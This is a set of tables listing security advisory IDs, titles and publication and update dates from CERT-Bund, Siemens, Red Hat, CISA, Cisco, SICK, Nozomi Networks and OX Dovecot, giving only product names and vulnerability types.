wid-sec-w-2024-3270 Python: Schwachstelle ermöglicht Codeausführung 2024-10-24T22:00:00.000+00:00 2024-12-04T23:00:00.000+00:00
wid-sec-w-2024-3189 Oracle Java SE: Mehrere Schwachstellen 2024-10-15T22:00:00.000+00:00 2024-12-04T23:00:00.000+00:00
wid-sec-w-2024-3082 Apache Commons IO: Schwachstelle ermöglicht Denial of Service 2024-10-03T22:00:00.000+00:00 2024-12-04T23:00:00.000+00:00
wid-sec-w-2024-3060 Google Chrome und Microsoft Edge: Mehrere Schwachstellen ermöglichen nicht spezifizierten Angriff 2024-10-01T22:00:00.000+00:00 2024-12-04T23:00:00.000+00:00
wid-sec-w-2024-3052 IBM WebSphere Application Server: Schwachstelle ermöglicht Cross-Site Scripting 2024-09-30T22:00:00.000+00:00 2024-12-04T23:00:00.000+00:00
wid-sec-w-2024-2056 FreeBSD Project FreeBSD OS: Mehrere Schwachstellen ermöglichen Privilegieneskalation und Codeausführung 2024-09-04T22:00:00.000+00:00 2024-12-04T23:00:00.000+00:00
wid-sec-w-2024-2040 OpenSSL: Schwachstelle ermöglicht Denial of Service 2024-09-03T22:00:00.000+00:00 2024-12-04T23:00:00.000+00:00
wid-sec-w-2024-1955 IBM Java SDK: Schwachstelle ermöglicht Denial of Service 2024-08-29T22:00:00.000+00:00 2024-12-04T23:00:00.000+00:00
wid-sec-w-2024-1929 Apache Portable Runtime (APR): Schwachstelle ermöglicht Offenlegung von Informationen 2024-08-26T22:00:00.000+00:00 2024-12-04T23:00:00.000+00:00
wid-sec-w-2024-1888 Linux Kernel: Mehrere Schwachstellen 2024-08-20T22:00:00.000+00:00 2024-12-04T23:00:00.000+00:00
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
ssa-097435 SSA-097435: Usernames Disclosure Vulnerability in Mendix Runtime 2024-09-10T00:00:00Z 2024-11-26T00:00:00Z
ssa-354569 SSA-354569: Multiple Vulnerabilities in Palo Alto Networks Virtual NGFW on RUGGEDCOM APE1808 Devices 2024-11-22T00:00:00Z 2024-11-22T00:00:00Z
ssa-824503 SSA-824503: Multiple WRL File Parsing Vulnerabilities in Tecnomatix Plant Simulation Before V2302.0018 and V2404.0007 2024-11-18T00:00:00Z 2024-11-18T00:00:00Z
ssa-472448 SSA-472448: Security Bypass Vulnerability in the SQL Client-Server Communication in Siveillance Video 2024-11-13T00:00:00Z 2024-11-13T00:00:00Z
ssa-962515 SSA-962515: Out of Bounds Read Vulnerability in Industrial Products 2024-05-14T00:00:00Z 2024-11-12T00:00:00Z
ssa-915275 SSA-915275: Multiple Vulnerabilities in SINEC INS Before V1.0 SP2 Update 3 2024-11-12T00:00:00Z 2024-11-12T00:00:00Z
ssa-914892 SSA-914892: Race Condition Vulnerability in Basic Authentication Implementation of Mendix Runtime 2024-11-12T00:00:00Z 2024-11-12T00:00:00Z
ssa-883918 SSA-883918: Information Disclosure Vulnerability in SIMATIC WinCC 2024-07-09T00:00:00Z 2024-11-12T00:00:00Z
ssa-876787 SSA-876787: Open Redirect Vulnerability in SIMATIC S7-1500 and S7-1200 CPUs 2024-10-08T00:00:00Z 2024-11-12T00:00:00Z
ssa-871035 SSA-871035: Session-Memory Deserialization Vulnerability in Siemens Engineering Platforms Before V19 2024-11-12T00:00:00Z 2024-11-12T00:00:00Z
ssa-773256 SSA-773256: Impact of Socket.IO CVE-2024-38355 on Siemens Industrial Products 2024-09-10T00:00:00Z 2024-11-12T00:00:00Z
ssa-723487 SSA-723487: RADIUS Protocol Susceptible to Forgery Attacks (CVE-2024-3596) - Impact to SCALANCE, RUGGEDCOM and Related Products 2024-07-09T00:00:00Z 2024-11-12T00:00:00Z
ssa-654798 SSA-654798: Incorrect Authorization Vulnerability in SIMATIC CP 1543-1 Devices 2024-11-12T00:00:00Z 2024-11-12T00:00:00Z
ssa-629254 SSA-629254: Remote Code Execution Vulnerability in SIMATIC SCADA and PCS 7 systems 2024-09-10T00:00:00Z 2024-11-12T00:00:00Z
ssa-616032 SSA-616032: Local Privilege Escalation Vulnerability in Spectrum Power 7 Before V24Q3 2024-11-12T00:00:00Z 2024-11-12T00:00:00Z
ssa-599968 SSA-599968: Denial-of-Service Vulnerability in Profinet Devices 2021-07-13T00:00:00Z 2024-11-12T00:00:00Z
ssa-454789 SSA-454789: Deserialization Vulnerability in TeleControl Server Basic V3.1 2024-11-12T00:00:00Z 2024-11-12T00:00:00Z
ssa-398330 SSA-398330: Vulnerabilities in the additional GNU/Linux subsystem of the SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP V3.1 2023-12-12T00:00:00Z 2024-11-12T00:00:00Z
ssa-364175 SSA-364175: Multiple Vulnerabilities in Palo Alto Networks Virtual NGFW on RUGGEDCOM APE1808 Devices Before V11.1.4-h1 2024-07-09T00:00:00Z 2024-11-12T00:00:00Z
ssa-354112 SSA-354112: Multiple Vulnerabilities in SCALANCE M-800 Family Before V8.2 2024-11-12T00:00:00Z 2024-11-12T00:00:00Z
ssa-351178 SSA-351178: Multiple Vulnerabilities in Solid Edge Before SE2024 Update 9 2024-11-12T00:00:00Z 2024-11-12T00:00:00Z
ssa-331112 SSA-331112: Multiple Vulnerabilities in SINEC NMS Before V3.0 SP1 2024-11-12T00:00:00Z 2024-11-12T00:00:00Z
ssa-265688 SSA-265688: Vulnerabilities in the additional GNU/Linux subsystem of the SIMATIC S7-1500 TM MFP V1.1 2024-04-09T00:00:00Z 2024-11-12T00:00:00Z
ssa-230445 SSA-230445: Stored XSS Vulnerability in OZW Web Servers Before V5.2 2024-11-12T00:00:00Z 2024-11-12T00:00:00Z
ssa-064257 SSA-064257: Privilege Escalation Vulnerability in SIPORT Before V3.4.0 2024-11-12T00:00:00Z 2024-11-12T00:00:00Z
ssa-054046 SSA-054046: Unauthenticated Information Disclosure in Web Server of SIMATIC S7-1500 CPUs 2024-10-08T00:00:00Z 2024-11-12T00:00:00Z
ssa-039007 SSA-039007: Heap-based Buffer Overflow Vulnerability in User Management Component (UMC) 2024-09-10T00:00:00Z 2024-11-12T00:00:00Z
ssa-000297 SSA-000297: Multiple SQLite Vulnerabilities in RUGGEDCOM CROSSBOW Station Access Controller Before V5.6 2024-11-12T00:00:00Z 2024-11-12T00:00:00Z
ssa-333468 SSA-333468: Multiple Vulnerabilities in InterMesh Subscriber Devices 2024-10-23T00:00:00Z 2024-10-23T00:00:00Z
ssa-438590 SSA-438590: Buffer Overflow Vulnerability in Siveillance Video Camera Drivers 2024-10-10T00:00:00Z 2024-10-10T00:00:00Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
rhsa-2023_7555 Red Hat Security Advisory: OpenShift API for Data Protection (OADP) 1.3.0 security update 2023-11-28T18:50:01+00:00 2024-12-23T08:00:43+00:00
rhsa-2023_6121 Red Hat Security Advisory: Migration Toolkit for Containers (MTC) 1.8.1 security and bug fix update 2023-10-25T15:56:00+00:00 2024-12-23T07:56:49+00:00
rhsa-2023_6115 Red Hat Security Advisory: OpenShift API for Data Protection security update 2023-10-25T14:01:58+00:00 2024-12-23T07:56:38+00:00
rhsa-2023_6048 Red Hat Security Advisory: ACS 4.2 enhancement and security update 2023-10-23T20:24:48+00:00 2024-12-23T07:56:35+00:00
rhsa-2023_5974 Red Hat Security Advisory: Network Observability security update 2023-10-20T16:49:58+00:00 2024-12-23T07:56:31+00:00
rhsa-2023_6118 Red Hat Security Advisory: OpenShift API for Data Protection security update 2023-10-25T14:23:36+00:00 2024-12-23T07:56:30+00:00
rhsa-2023_6031 Red Hat Security Advisory: Cryostat security update 2023-10-23T14:24:36+00:00 2024-12-23T07:56:27+00:00
rhsa-2023_6116 Red Hat Security Advisory: OpenShift API for Data Protection (OADP) 1.0.14 security and bug fix update 2023-10-25T14:16:47+00:00 2024-12-23T07:56:22+00:00
rhsa-2023_5976 Red Hat Security Advisory: Service Telemetry Framework 1.5.2 security update 2023-10-20T17:18:33+00:00 2024-12-23T07:56:22+00:00
rhsa-2023_6041 Red Hat Security Advisory: Self Node Remediation Operator 0.7.1 security update 2023-10-23T18:31:18+00:00 2024-12-23T07:56:20+00:00
rhsa-2023_6085 Red Hat Security Advisory: Red Hat OpenShift distributed tracing security update 2023-10-24T15:32:35+00:00 2024-12-23T07:56:14+00:00
rhsa-2023_5971 Red Hat Security Advisory: Red Hat OpenStack Platform 17.1.1 (director-operator) security update 2023-10-20T14:56:06+00:00 2024-12-23T07:56:13+00:00
rhsa-2023_6039 Red Hat Security Advisory: Node Maintenance Operator 5.0.1 security update 2023-10-23T18:30:46+00:00 2024-12-23T07:56:11+00:00
rhsa-2023_6084 Red Hat Security Advisory: RHACS 3.74 enhancement and security update 2023-10-24T14:57:00+00:00 2024-12-23T07:56:06+00:00
rhsa-2023_6042 Red Hat Security Advisory: Self Node Remediation Operator 0.5.1 security update 2023-10-23T18:39:36+00:00 2024-12-23T07:56:03+00:00
rhsa-2023_5964 Red Hat Security Advisory: Red Hat OpenStack Platform 16.2.5 (collectd-libpod-stats) security update 2023-10-20T14:54:29+00:00 2024-12-23T07:56:03+00:00
rhsa-2023_6071 Red Hat Security Advisory: RHACS 4.0 enhancement and security update 2023-10-24T09:41:00+00:00 2024-12-23T07:55:57+00:00
rhsa-2023_6040 Red Hat Security Advisory: Node Maintenance Operator 5.2.1 security update 2023-10-23T18:30:57+00:00 2024-12-23T07:55:55+00:00
rhsa-2023_5967 Red Hat Security Advisory: Red Hat OpenStack Platform 16.1.9 (collectd-libpod-stats, etcd) security update 2023-10-20T14:51:43+00:00 2024-12-23T07:55:55+00:00
rhsa-2023_6077 Red Hat Security Advisory: toolbox security update 2023-10-24T12:18:38+00:00 2024-12-23T07:55:50+00:00
rhsa-2023_6044 Red Hat Security Advisory: Cost Management security update 2023-10-23T19:21:34+00:00 2024-12-23T07:55:47+00:00
rhsa-2023_5970 Red Hat Security Advisory: Red Hat OpenStack Platform 17.1.1 (collectd-libpod-stats) security update 2023-10-20T14:51:03+00:00 2024-12-23T07:55:47+00:00
rhsa-2023_6061 Red Hat Security Advisory: Red Hat OpenShift Pipelines 1.12.1 release and security update 2023-10-23T21:57:37+00:00 2024-12-23T07:55:42+00:00
rhsa-2023_5982 Red Hat Security Advisory: Red Hat Satellite Client security and bug fix update 2023-10-20T22:28:07+00:00 2024-12-23T07:55:39+00:00
rhsa-2023_5965 Red Hat Security Advisory: Red Hat OpenStack Platform 16.2.5 (collectd-libpod-stats, etcd) security update 2023-10-20T14:54:26+00:00 2024-12-23T07:55:39+00:00
rhsa-2023_6057 Red Hat Security Advisory: toolbox security update 2023-10-23T21:13:36+00:00 2024-12-23T07:55:34+00:00
rhsa-2023_5980 Red Hat Security Advisory: Satellite 6.11.5.6 async security update 2023-10-20T18:46:14+00:00 2024-12-23T07:55:31+00:00
rhsa-2023_5969 Red Hat Security Advisory: Red Hat OpenStack Platform 17.1.1 security update 2023-10-20T14:51:03+00:00 2024-12-23T07:55:31+00:00
rhsa-2023_6059 Red Hat Security Advisory: Red Hat OpenShift Pipelines Client tkn for 1.12.1 release and security update 2023-10-23T21:20:26+00:00 2024-12-23T07:55:25+00:00
rhsa-2023_5979 Red Hat Security Advisory: Satellite 6.12.5.2 Async Security Update 2023-10-20T18:45:24+00:00 2024-12-23T07:55:23+00:00
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
icsa-24-338-06 Fuji Electric Tellus Lite V-Simulator 2024-12-03T07:00:00.000000Z 2024-12-03T07:00:00.000000Z
icsa-24-338-05 Fuji Electric Monitouch V-SFT 2024-12-03T07:00:00.000000Z 2024-12-03T07:00:00.000000Z
icsa-24-338-04 ICONICS and Mitsubishi Electric Products 2024-12-03T07:00:00.000000Z 2024-12-03T07:00:00.000000Z
icsa-24-338-03 Open Automation Software 2024-12-03T07:00:00.000000Z 2024-12-03T07:00:00.000000Z
icsa-24-338-01 Ruijie Reyee OS 2024-12-03T07:00:00.000000Z 2024-12-03T07:00:00.000000Z
icsa-24-184-03 ICONICS and Mitsubishi Electric Products (Update A) 2024-07-02T06:00:00.000000Z 2024-12-03T07:00:00.000000Z
icsa-22-307-01 ETIC Telecom Remote Access Server (RAS) (Update B) 2022-11-03T06:00:00.000000Z 2024-12-03T07:00:00.000000Z
va-24-254-02 TopQuadrant TopBraid EDG Insecure External Password Storage and XXE Vulnerabilities 2024-09-10T16:03:00Z 2024-11-28T01:00:00Z
va-24-331-01 Valor Apps Easy Folder Listing Pro Joomla! extension deserialization vulnerability 2024-11-26T18:15:49Z 2024-11-26T18:15:49Z
icsa-24-256-05 Siemens Mendix Runtime 2024-09-10T00:00:00.000000Z 2024-11-26T00:00:00.000000Z
icsa-24-338-02 Siemens RUGGEDCOM APE1808 2024-11-22T00:00:00.000000Z 2024-11-22T00:00:00.000000Z
icsma-24-200-01 Philips Vue PACS (Update A) 2024-07-18T06:00:00.000000Z 2024-11-21T07:00:00.000000Z
icsa-24-326-07 mySCADA myPRO Manager 2024-11-21T07:00:00.000000Z 2024-11-21T07:00:00.000000Z
icsa-24-326-02 OSCAT Basic Library 2024-11-21T07:00:00.000000Z 2024-11-21T07:00:00.000000Z
icsa-24-326-01 Automated Logic WebCTRL Premium Server 2024-11-21T07:00:00.000000Z 2024-11-21T07:00:00.000000Z
va-24-325-01 Versa Networks Versa Director insecure default PostgreSQL configuration 2024-11-20T18:33:57Z 2024-11-20T18:33:57Z
icsa-24-324-01 Mitsubishi Electric MELSEC iQ-F Series 2024-11-19T07:00:00.000000Z 2024-11-19T07:00:00.000000Z
icsa-24-319-14 Rockwell Automation FactoryTalk Updater (Update A) 2024-11-14T07:00:00.000000Z 2024-11-18T07:00:00.000000Z
icsa-24-319-13 Rockwell Automation Verve Reporting (Update A) 2024-11-14T07:00:00.000000Z 2024-11-18T07:00:00.000000Z
va-24-201-01 Adminer and AdminerEvo Multiple Vulnerabilities 2024-07-19T16:00:00Z 2024-11-14T17:00:00Z
icsma-24-319-01 Baxter Life2000 Ventilation System 2024-11-14T07:00:00.000000Z 2024-11-14T07:00:00.000000Z
icsa-24-319-17 2N Access Commander 2024-11-14T07:00:00.000000Z 2024-11-14T07:00:00.000000Z
icsa-24-319-16 Hitachi Energy MSM 2024-11-14T07:00:00.000000Z 2024-11-14T07:00:00.000000Z
icsa-24-319-15 Rockwell Automation Arena Input Analyzer 2024-11-14T07:00:00.000000Z 2024-11-14T07:00:00.000000Z
icsa-24-291-01 Elvaco M-Bus Metering Gateway CMe3100 (Update A) 2024-10-17T06:00:00.000000Z 2024-11-14T07:00:00.000000Z
va-24-317-01 Ivanti Connect Secure and Ivanti Policy Secure Multiple Vulnerabilities 2024-11-13T20:32:00Z 2024-11-13T20:32:00Z
icsa-24-317-03 Rockwell Automation FactoryTalk View ME 2024-11-12T07:00:00.000000Z 2024-11-12T07:00:00.000000Z
icsa-24-317-02 Hitachi Energy TRO600 2024-11-12T07:00:00.000000Z 2024-11-12T07:00:00.000000Z
icsa-24-317-01 Subnet Solutions PowerSYSTEM Center 2024-11-12T07:00:00.000000Z 2024-11-12T07:00:00.000000Z
icsa-23-306-03 Mitsubishi Electric FA products (Update A) 2023-11-02T06:00:00.000000Z 2024-11-12T07:00:00.000000Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
cisco-sa-ap-dos-capwap-ddmczs4m Cisco Access Point Software Uncontrolled Resource Consumption Vulnerability 2023-09-27T16:00:00+00:00 2024-12-12T12:27:21+00:00
cisco-sa-nxos-image-sig-bypas-pqdrqvjl Cisco NX-OS Software Image Verification Bypass Vulnerability 2024-12-04T16:00:00+00:00 2024-12-11T16:28:03+00:00
cisco-sa-swa-priv-esc-7uhpzscc Cisco Secure Web Appliance Privilege Escalation Vulnerability 2024-07-17T16:00:00+00:00 2024-11-22T17:13:56+00:00
cisco-sa-iosxr-load-infodisc-9rdor5fq Cisco IOS XR Software Bootloader Unauthenticated Information Disclosure Vulnerability 2023-03-08T16:00:00+00:00 2024-11-13T15:00:06+00:00
cisco-sa-phone-infodisc-sbyqqvbg Cisco 7800, 8800, and 9800 Series Phones Information Disclosure Vulnerability 2024-11-06T16:00:00+00:00 2024-11-06T16:00:00+00:00
cisco-sa-ndfc-sqli-cyppaxrl Cisco Nexus Dashboard Fabric Controller SQL Injection Vulnerability 2024-11-06T16:00:00+00:00 2024-11-06T16:00:00+00:00
cisco-sa-mpp-xss-8tav2tvf Cisco 6800, 7800, 8800, and 9800 Series Phones with Multiplatform Firmware Stored Cross-Site Scripting Vulnerabilities 2024-11-06T16:00:00+00:00 2024-11-06T16:00:00+00:00
cisco-sa-ise-multi-vulns-af544ed5 Cisco Identity Services Engine Vulnerabilities 2024-11-06T16:00:00+00:00 2024-11-06T16:00:00+00:00
cisco-sa-ise-multi-vuln-dbqdwry Cisco Identity Services Engine Vulnerabilities 2024-11-06T16:00:00+00:00 2024-11-06T16:00:00+00:00
cisco-sa-ise-auth-bypass-bbrf7mke Cisco Identity Services Engine Authorization Bypass and Cross-Site Scripting Vulnerabilities 2024-11-06T16:00:00+00:00 2024-11-06T16:00:00+00:00
cisco-sa-imp-inf-disc-cupkua5n Cisco Unified Communications Manager IM & Presence Service Information Disclosure Vulnerability 2024-11-06T16:00:00+00:00 2024-11-06T16:00:00+00:00
cisco-sa-esa-wsa-sma-xss-zym3f49n Cisco Secure Email and Web Manager, Secure Email Gateway, and Secure Web Appliance Stored Cross-Site Scripting Vulnerability 2024-11-06T16:00:00+00:00 2024-11-06T16:00:00+00:00
cisco-sa-epnmpi-sxss-yyf2zkxs Cisco Evolved Programmable Network Manager and Cisco Prime Infrastructure Stored Cross-Site Scripting Vulnerability 2024-11-06T16:00:00+00:00 2024-11-06T16:00:00+00:00
cisco-sa-ece-dos-oqb9ufev Cisco Enterprise Chat and Email Denial of Service Vulnerability 2024-11-06T16:00:00+00:00 2024-11-06T16:00:00+00:00
cisco-sa-cucm-xss-svckmmw Cisco Unified Communications Manager Cross-Site Scripting Vulnerability 2024-11-06T16:00:00+00:00 2024-11-06T16:00:00+00:00
cisco-sa-cmm-info-disc-9zemahga Cisco Meeting Management Information Disclosure Vulnerability 2024-11-06T16:00:00+00:00 2024-11-06T16:00:00+00:00
cisco-sa-ccmp-sxss-qbtdbzdd Cisco Unified Contact Center Management Portal Stored Cross-Site Scripting Vulnerability 2024-11-06T16:00:00+00:00 2024-11-06T16:00:00+00:00
cisco-sa-backhaul-ap-cmdinj-r7e28ecs Cisco Unified Industrial Wireless Software for Ultra-Reliable Wireless Backhaul Access Point Command Injection Vulnerability 2024-11-06T16:00:00+00:00 2024-11-06T16:00:00+00:00
cisco-sa-3550-acl-bypass-mhskzc2q Cisco Nexus 3550-F Switches Access Control List Programming Vulnerability 2024-11-06T16:00:00+00:00 2024-11-06T16:00:00+00:00
cisco-sa-asaftd-acl-bypass-vvnlnkqf Cisco Adaptive Security Appliance and Firepower Threat Defense Software AnyConnect Access Control List Bypass Vulnerabilities 2024-10-23T16:00:00+00:00 2024-10-24T21:19:17+00:00
cisco-sa-fmc-xss-infodisc-rl4mjfer Cisco Secure Firewall Management Center Software Cross-Site Scripting and Information Disclosure Vulnerabilities 2024-10-23T16:00:00+00:00 2024-10-24T11:52:38+00:00
cisco-sa-ata19x-multi-rdteqrsy Cisco ATA 190 Series Analog Telephone Adapter Firmware Vulnerabilities 2024-10-16T16:00:00+00:00 2024-10-24T11:47:37+00:00
cisco-sa-snort-rf-bypass-oy8f3pnm Multiple Cisco Products Snort Rate Filter Bypass Vulnerability 2024-10-23T16:00:00+00:00 2024-10-23T16:00:00+00:00
cisco-sa-snort-bypass-ptry37fx Cisco Firepower Threat Defense Software TCP Snort 3 Detection Engine Bypass Vulnerability 2024-10-23T16:00:00+00:00 2024-10-23T16:00:00+00:00
cisco-sa-sa-ftd-snort-fw-bcjtzpmu Cisco Firepower Threat Defense Software and Cisco FirePOWER Services TCP/IP Traffic with Snort 2 and Snort 3 Denial of Service Vulnerability 2024-10-23T16:00:00+00:00 2024-10-23T16:00:00+00:00
cisco-sa-ftd2100-snort-dos-m9humt75 Cisco Firepower Threat Defense Software for Cisco Firepower 2100 Series Appliances TCP UDP Snort 2 and Snort 3 Denial of Service Vulnerability 2024-10-23T16:00:00+00:00 2024-10-23T16:00:00+00:00
cisco-sa-ftd-vdb-snort-djj4cnbr Cisco Firepower Threat Defense Software Vulnerability Database with Snort Detection Engine Security Policy Bypass and Denial of Service Issue 2024-10-23T16:00:00+00:00 2024-10-23T16:00:00+00:00
cisco-sa-ftd-tls-dos-qxye5ufy Cisco Firepower Threat Defense Software for Firepower 2100 Series TLS Denial of Service Vulnerability 2024-10-23T16:00:00+00:00 2024-10-23T16:00:00+00:00
cisco-sa-ftd-statcred-dfc8txt5 Cisco Firepower Threat Defense Software for Firepower 1000, 2100, 3100, and 4200 Series Static Credential Vulnerability 2024-10-23T16:00:00+00:00 2024-10-23T16:00:00+00:00
cisco-sa-ftd-geoip-bypass-mb4zrdu Cisco Firepower Threat Defense Software Geolocation ACL Bypass Vulnerability 2024-10-23T16:00:00+00:00 2024-10-23T16:00:00+00:00
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
sca-2024-0005 Vulnerability in SICK Incoming Goods Suite 2024-11-19T00:00:00.000Z 2024-11-19T00:00:00.000Z
sca-2024-0004 Third party vulnerabilities in SICK CDE-100 2024-11-07T12:00:00.000Z 2024-11-07T12:00:00.000Z
sca-2024-0003 Critical vulnerability in multiple SICK products 2024-10-17T13:00:00.000Z 2024-10-17T13:00:00.000Z
sca-2024-0002 Vulnerability in SICK MSC800 2024-09-11T23:00:00.000Z 2024-09-11T23:00:00.000Z
sca-2024-0001 Vulnerability in SICK Logistics Analytics Products and SICK Field Analytics 2024-01-29T00:00:00.000Z 2024-01-29T00:00:00.000Z
sca-2023-0011 Vulnerability in multiple SICK Flexi Soft Gateways 2023-10-23T11:00:00.000Z 2023-10-23T11:00:00.000Z
sca-2023-0010 Vulnerabilities in SICK Application Processing Unit 2023-10-09T11:00:00.000Z 2023-10-09T11:00:00.000Z
sca-2023-0008 Vulnerability in SICK SIM1012 2023-09-29T13:00:00.000Z 2023-09-29T13:00:00.000Z
sca-2023-0009 Vulnerability in Wibu-Systems CodeMeter Runtime affects multiple SICK products 2023-09-29T10:00:00.000Z 2023-09-29T10:00:00.000Z
sca-2023-0007 Vulnerabilities in SICK LMS5xx 2023-08-25T11:00:00.000Z 2023-08-25T11:00:00.000Z
sca-2023-0006 Vulnerabilities in SICK ICR890-4 2023-07-10T13:00:00.000Z 2023-07-10T13:00:00.000Z
sca-2023-0005 Vulnerabilities in SICK EventCam App 2023-06-19T11:00:00.000Z 2023-06-19T11:00:00.000Z
sca-2023-0004 Vulnerabilities in SICK FTMg 2023-05-11T13:00:00.000Z 2023-05-11T13:00:00.000Z
sca-2023-0003 Vulnerability in SICK Flexi Soft and Flexi Classic Gateways 2023-05-03T13:00:00.000Z 2023-05-03T13:00:00.000Z
sca-2023-0002 Use of Telnet in multiple SICK Flexi Soft and Flexi Classic Gateways 2023-04-11T10:00:00.000Z 2023-04-11T10:00:00.000Z
sca-2023-0001 Bootloader mode vulnerability in Flexi Soft Gateways v3 2023-02-20T14:00:00.000Z 2023-02-20T14:00:00.000Z
sca-2022-0015 Use of a Broken or Risky Cryptographic Algorithm in SICK RFU6xx RADIO FREQUEN. SENSOR 2022-12-08T16:00:00.000Z 2022-12-08T16:00:00.000Z
sca-2022-0013 Password recovery vulnerability affects multiple SICK SIMs 2022-10-21T13:00:00.000Z 2022-11-04T14:00:00.000Z
sca-2022-0014 SICK FlexiCompact affected by Denial of Service vulnerability 2022-10-31T11:00:00.000Z 2022-10-31T11:00:00.000Z
sca-2022-0012 OpenSSL vulnerability affects multiple SICK SIMs 2022-08-08T13:00:00.000Z 2022-08-03T13:00:00.000Z
sca-2022-0010 Vulnerability in SICK Flexi Soft Designer & Safety Designer 2022-05-16T10:00:00.000Z 2022-07-19T10:00:00.000Z
sca-2022-0011 Vulnerabilities in SICK Package Analytics 2022-06-08T15:00:00.000Z 2022-06-08T15:00:00.000Z
sca-2022-0009 Vulnerability in SICK Flexi Soft PROFINET IO Gateway FX0-GPNT and SICK microScan3 PROFINET 2022-04-29T15:00:00.000Z 2022-04-29T15:00:00.000Z
sca-2022-0008 Vulnerability in SICK Gateways for Flexi Soft, Flexi Compact, SICK EFI Gateway UE4740, SICK microScan3 and outdoorScan3 2022-04-29T15:00:00.000Z 2022-04-29T15:00:00.000Z
sca-2022-0007 Vulnerabilities in SICK MARSIC300 2022-04-21T15:00:00.000Z 2022-04-21T15:00:00.000Z
sca-2022-0006 Vulnerability in SICK MSC800 2022-04-11T15:00:00.000Z 2022-04-11T15:00:00.000Z
sca-2022-0005 Vulnerability in SICK Overall Equipment Effectiveness (OEE) 2022-04-11T15:00:00.000Z 2022-04-11T15:00:00.000Z
sca-2022-0004 Microsoft vulnerability affects multiple SICK IPCs with SICK MEAC 2022-04-11T15:00:00.000Z 2022-03-31T15:00:00.000Z
sca-2022-0003 Vulnerabilities in SICK FTMg 2022-03-31T15:00:00.000Z 2022-03-31T15:00:00.000Z
sca-2022-0002 PwnKit vulnerability affects multiple SICK IPCs 2022-02-23T16:00:00.000Z 2022-02-23T16:00:00.000Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
nn-2024_2-01 Incorrect authorization for Reports configuration in Guardian/CMC before 24.2.0 2024-09-11T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2024_1-01 DoS on IDS parsing of malformed Radius packets in Guardian before 23.4.1 2024-04-10T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_9-01 Authenticated SQL Injection on Query functionality in Guardian/CMC before 22.6.3 and 23.1.0 2023-09-18T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_8-01 Session Fixation in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_7-01 DoS via SAML configuration in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_6-01 Partial DoS on Reports section due to null report name in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_4-01 Stored Cross-Site Scripting (XSS) in Threat Intelligence rules in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_3-01 Authenticated Blind SQL Injection on alerts count in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_2-01 Authenticated Blind SQL Injection on sorting in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_17-01 Information disclosure via audit records for OpenAPI requests in Guardian/CMC before 23.4.1 2024-04-10T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_15-01 Sensitive data exfiltration via unsafe permissions on Windows systems in Arc before v1.6.0 2024-05-15T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_12-01 Check Point IoT integration: WebSocket returns assets data without authentication in Guardian/CMC before 23.3.0 2024-01-15T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_11-01 SQL Injection on IDS parsing of malformed asset fields in Guardian/CMC >= 22.6.0 before 22.6.3 and 23.1.0 2023-09-18T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_10-01 DoS on IDS parsing of malformed asset fields in Guardian/CMC >= 22.6.0 before 22.6.3 and 23.1.0 2023-09-18T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2022_2-02 Authenticated RCE on project configuration import in Guardian/CMC before 22.0.0 2022-02-14T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2022_2-01 Authenticated RCE on logo report upload in Guardian/CMC before 22.0.0 2022-02-14T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_5-01 Information disclosure via the debug function in assertions in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-05-20T11:00:00.000Z
nn-2023_16-01 Path traversal via 'zip slip' in Arc before v1.6.0 2024-05-15T11:00:00.000Z 2024-05-20T11:00:00.000Z
nn-2023_14-01 Unsafe temporary data privileges on Unix systems in Arc before v1.6.0 2024-05-15T11:00:00.000Z 2024-05-20T11:00:00.000Z
nn-2023_13-01 Missing authentication for local web interface in Arc before v1.6.0 2024-05-15T11:00:00.000Z 2024-05-20T11:00:00.000Z
nn-2023_1-01 Authenticated SQL Injection on Alerts in Guardian/CMC before 22.5.2 2023-05-03T11:00:00.000Z 2024-05-20T11:00:00.000Z
nn-2021_2-01 Authenticated command path traversal on timezone settings in Guardian/CMC before 20.0.7.4 2021-02-22T11:00:00.000Z 2024-05-20T11:00:00.000Z
nn-2021_1-01 Authenticated command injection when changing date settings or hostname in Guardian/CMC before 20.0.7.4 2021-02-22T11:00:00.000Z 2024-05-20T11:00:00.000Z
nn-2020_3-01 Angular template injection on custom report name field 2020-05-26T11:00:00.000Z 2024-05-20T11:00:00.000Z
nn-2020_2-01 Cross-site request forgery attack on change password form 2020-05-26T11:00:00.000Z 2024-05-20T11:00:00.000Z
nn-2019_2-01 CSV Injection on node label 2019-11-11T11:00:00.000Z 2024-05-20T11:00:00.000Z
nn-2019_1-01 Stored XSS in field name data model 2019-11-11T11:00:00.000Z 2024-05-20T11:00:00.000Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
oxdc-adv-2024-0003 OX Dovecot Pro Security Advisory OXDC-ADV-2024-0003 2024-09-10T00:00:00+02:00 2024-09-10T00:00:00+00:00
oxdc-adv-2024-0002 OX Dovecot Pro Security Advisory OXDC-ADV-2024-0002 2024-09-10T00:00:00+02:00 2024-09-10T00:00:00+00:00
